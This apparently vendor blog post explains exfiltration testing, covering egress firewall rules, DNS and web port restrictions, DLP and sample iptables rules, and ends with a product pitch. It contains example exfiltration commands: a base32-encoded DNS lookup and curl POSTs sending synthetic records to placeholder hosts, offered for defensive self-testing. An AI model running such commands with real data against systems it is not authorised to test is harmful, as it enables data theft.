Exfiltration Testing and How to Do It

Exfiltration testing simulates a malicious actor stealing sensitive data from your environment to see which controls stop or detect the theft. Many organizations commission a pen test that either skips internal testing entirely or focuses only on vulnerabilities on individual devices rather than the boundaries between environments. Exfiltration testing is often reserved for red team exercises, which few companies outside the most mature security programs ever run.

This leaves a large hole for companies that can only afford one simple pen test a year, or that get no testing at all. Companies that store sensitive data such as health records (PHI), credit card data (PCI), or other personally identifiable information (PII) are especially exposed. A breach is costly: the US Department of Health and Human Services (HHS) estimates that each stolen PHI record costs over $400, so even a modest breach of 10,000 records would exceed $4 million. At that rate a breach can bankrupt a small company quickly, and the cost of proactive testing pales in comparison.

Exfiltration testing fits into this preventative model by making data as difficult as possible to steal, and by ensuring that when theft does occur, alarms fire and the activity is stopped before too much is lost. The basic starting point is to isolate all systems holding sensitive data into a single area (a VLAN or other network boundary works) and give those systems the strongest tooling. Nearly all data exfiltration touches the file system, so a strong endpoint protection solution with behavioral anomaly detection can catch odd or unusual actions. Next, reduce who can access those systems and what permissions they hold. From there, reduce both the inbound AND outbound ports to the bare minimum. The outbound side is often overlooked, and even a well-maintained whitelist does not account for the tricks attackers use to smuggle data out.
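
As a minimal sketch of what locked-down egress might look like on a Linux gateway using iptables (the subnet and host addresses below are hypothetical placeholders, not a production ruleset):

    # Egress rules for a sensitive-data VLAN (10.10.50.0/24 - placeholder subnet).
    # Only the internal DNS server may resolve externally, and only one
    # application server may reach the web; everything else is logged and dropped.
    iptables -A FORWARD -s 10.10.50.10 -p udp --dport 53 -j ACCEPT   # internal DNS server
    iptables -A FORWARD -s 10.10.50.10 -p tcp --dport 53 -j ACCEPT
    iptables -A FORWARD -s 10.10.50.20 -p tcp --dport 443 -j ACCEPT  # app server needing HTTPS
    iptables -A FORWARD -s 10.10.50.0/24 -j LOG --log-prefix "EGRESS-DENY: "
    iptables -A FORWARD -s 10.10.50.0/24 -j DROP

Because ACCEPT rules are appended before the final LOG/DROP pair, the denied traffic also produces log entries you can alert on.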

DNS tunneling and HTTP POST smuggling are two methods that these protections often miss, because many admins assume there is no harm in opening ports 53, 80, or 443 to all systems. The recommendation is to allow only the internal DNS servers outbound over port 53, and to restrict ports 80/443 (and other web ports) to only those systems that genuinely need internet access. Once that is done, a firewall provider that performs IP/URL reputation and domain-age checks adds another layer of defense: attackers rotate their command and control (C2) servers frequently, so the URLs are rarely more than a month old, and some last only a few days. Finally, a strong DLP solution that performs pattern recognition and inspects email contents is the last line of defense. This matters especially during a business email compromise (BEC) of a user who handles sensitive data, since it prevents the attacker from simply emailing the data out.
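
You can simulate both channels yourself with standard tools. This is a rough sketch assuming GNU coreutils' base32 is available; exfil-test.example.com is a placeholder for a domain you control, so you can watch for the traffic on its authoritative server, and the "record" is synthetic:

    # Simulate DNS exfiltration: encode a synthetic record and "leak" it as a
    # subdomain lookup. If only internal DNS servers may resolve externally,
    # this should fail or trip an alert from any other host.
    payload=$(printf 'FAKE-SSN-000-00-0000' | base32 | tr -d '=')
    dig +short "$payload.exfil-test.example.com" TXT

    # Simulate HTTP POST smuggling: send the same synthetic record outbound.
    # Working egress filtering and DLP should block or at least alert on this.
    curl -s -X POST -d 'record=FAKE-SSN-000-00-0000' "https://exfil-test.example.com/upload"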

A few easy ways to check some of these controls:

  • Sites like DLP Test offer free sample data and test servers so you can run your own test against your DLP solution (see the sketch after this list).

  • Use Nmap to check which outbound ports your firewall allows. From an internal machine, run "nmap -p- egadz.metasploit.com" or "nmap -p- letmeoutofyour.net". These hosts answer on every port, so any port reported as open is a port your perimeter lets out.

  • Ask your pen testing provider, MSSP, or IT service provider to verify that all sensitive data areas are secure. A data leakage test also helps: testers look for sensitive data on servers or systems that should not hold it, which is common with repurposed or legacy systems.
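
As a rough sketch of the first two checks (the endpoint URL is a placeholder, and the card number is the well-known 4111 test PAN; use the current sample data and endpoints published on the DLP Test site itself):

    # DLP check: send a synthetic PAN/SSN-style record outbound and confirm
    # your DLP blocks it or raises an alert.
    curl -s -X POST -d 'ccn=4111-1111-1111-1111&ssn=000-00-0000' "https://dlptest.example.com/http-post"

    # Egress check: scan all 65535 TCP ports in greppable output, keeping only
    # the open ones, i.e. the ports your firewall allows outbound.
    nmap -p- --open -T4 -oG - letmeoutofyour.net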

Knowing where your data lives is important, and knowing where it is going is even more so. Tools like Glassportal help you understand the risk in each environment so your sensitive data warehouses can be better protected. Contact us to find out more: demo@glassportal.io.
